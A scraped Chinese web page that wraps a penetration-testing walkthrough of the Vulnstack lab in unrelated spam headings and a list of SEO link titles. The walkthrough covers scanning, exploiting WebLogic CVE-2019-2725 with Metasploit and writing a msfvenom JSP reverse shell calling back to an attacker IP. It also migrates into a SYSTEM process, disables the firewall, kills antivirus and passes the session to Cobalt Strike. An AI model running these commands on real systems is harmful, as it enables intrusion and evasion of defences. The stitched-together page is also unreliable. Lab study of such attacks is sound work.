当前位置: 首页 > news >正文

一个人可以做几个网站负责人佛山市做网站

一个人可以做几个网站负责人,佛山市做网站,长沙建站工作室,wordpress公司网页主题靶场下载来自#xff1a; http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场统一登录密码#xff1a;1qazWSX 按大佬的说法是 环境需要模拟内网和外网两个网段#xff0c;PC端虚拟机相当于网关服务器#xff0c;所以需要两张网卡#xff0c;一个用来向外网提供web… 靶场下载来自 http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场统一登录密码1qazWSX 按大佬的说法是 环境需要模拟内网和外网两个网段PC端虚拟机相当于网关服务器所以需要两张网卡一个用来向外网提供web服务一个是通向内网 这是pc的配置 这是DC的配置 web的配置和pc的配置一样就行就是两台网络适配器 将新增的网卡VMnet2子网ip调成10段。 这是官网的环境说明 可以看到dmz网段也就是外网网段是写成了192.168.111.1/24 我们最后还要用ipconfig查看各主机的ip WEB主机 PC主机 DC主机 以及我们的kali WEB主机进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin 以管理员身份运行strartWebLogic.cmd后环境就搭建好了 首先用nmap扫描一下目标IP nmap -sS -sV -Pn -T4 192.168.111.80 -sS                                                       使用TCP的SYN进行扫描很少在目标主机上留下扫描日志 -sV                                                       探测服务/版本信息 -Pn                                                       将所有主机视为在在线跳过主机发现可以穿过防火墙 -T4                                                       代表扫描时间间隔 nmap的使用见 nmap详细使用教程_nmap使用教程-CSDN博客 我们可以百度一下开放这些端口可能会存在些什么代表性的漏洞 445端口开放意味着存在smb服务可能存在ms17_010永恒之蓝漏洞。 7001端口说明目标IP存在weblogic服务可能存在反序列化SSRF,任意文件上传后台路径泄露 开放139端口就存在Samba服务就可能存在爆破/未授权访问/远程命令执行漏洞 放1433端口就存在mssql服务可能存在爆破/注入/SA弱口令。 开放3389端口就存在远程桌面。 常见的端口及可能存在的漏洞参考文章 https://www.cnblogs.com/zcg-cpdd/p/14630766.html 在此之前我们还需要下weblogicscan weblogicscan工具地址 1.https://gitee.com/opticfiber/WeblogicScan/repository/archive/master.zip 2.https://github.com/dr0op/WeblogicScan.git 执行命令 python WeblogicScan.py -u ip -p 7001 存在两个CVE漏洞CVE-2017-3506、CVE-2019-2725 存在后台路径还存在一个SSRF漏洞 SSRF漏洞存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 知道了存在CVE-2019-2725的漏洞使用msf查看一下漏洞利用脚本 msfconsole search CVE-2019-2725use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 在此之前我们还需要下载一个java反序列化工具 下载链接见 Releases · shack2/javaserializetools · GitHub 下第一个就行 java -jar 文件 即可运行 执行 msf生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.111.136 LPORT4444 -f jsp /root/test.jsp 把shell写到控制台images目录中 \Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马 msf开启监听访问shell.jsp,获得回话administrator权限 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp msf操作教程见 【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客 我们用shell systeminfo命令 用chcp 65001解决出现的乱码 我们用ps命令查看进程 getpid查看进程号得到 进程迁移到system权限进程services 百度了一下更多见Services.exe是什么如何辨别services.exe是否为病毒-太平洋IT百科 migrate 512进程迁移后是system权限 netsh advfirewall set allprofiles state off 关闭防火墙 run killav 关闭杀软 内网 打开cs创建一个监听器 这里需要注意的就是cs需要java11 我们在cmd界面用java -version可以查看此时的java版本 创建监听器 执行命令 background use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.235.129 set lport 8888 set session 2 run 在cs中进行提权
http://www.dnsts.com.cn/news/145006.html

相关文章:

  • 网络营销企业网站优化温州电力建设有限公司网站
  • 游戏前端转网站开发如何进行课程中心网站建设
  • 公司建设网站怎么做账网站建设合同 含维护费
  • 做的网站上传到服务器wordpress模板如何安装
  • 西安做网站哪家公司好内网 做 网站
  • 网站做关键词首页如何让我的网站被百度收录
  • 高校网站站群建设公司网站建设注意事项
  • 网站默认图片素材深圳it公司
  • 网站域名解析失败网页已改版
  • 音乐网站如何建设的注册电商网店怎么注册
  • 闽侯县住房和城乡建设局网站本地利用wordpress建站
  • php网站开发进程怎么做网站链接广告
  • 网站流量太高 如何做负载均衡wordpress next page
  • 网站建设电子合同中国制造网网站建设的优势
  • 企业网站需求方案佛山做网站的公司
  • 网站改版 内容怎么用网网站模板做网站
  • 尼乐清网站建设深圳市建设集团和恒大的关系
  • 济南哪里有网站建设公司宁波seo快速优化技术
  • 有了域名和主机怎么做网站优秀的交互设计作品集
  • 佛山网站设计建设域名注册信息在哪里找到
  • wordpress建站环境南京 网站制作公司
  • 网站建设seo需求文档织梦自动生成手机网站
  • 大型电商网站开发成本网页中的交互设计案例
  • 怎么将html变成为网址网站栏目设计优化方案
  • 万户高端网站建设网站死链接怎么删除
  • 打折网站模板宁波专业网站公司
  • 专业做视频的网站免费的app源码网
  • asp.net的网站开发手机网站 微信
  • wordpress云建站系统wordpress怎么安装插件
  • 建设部网站城乡规划资质标准自建电商平台的优缺点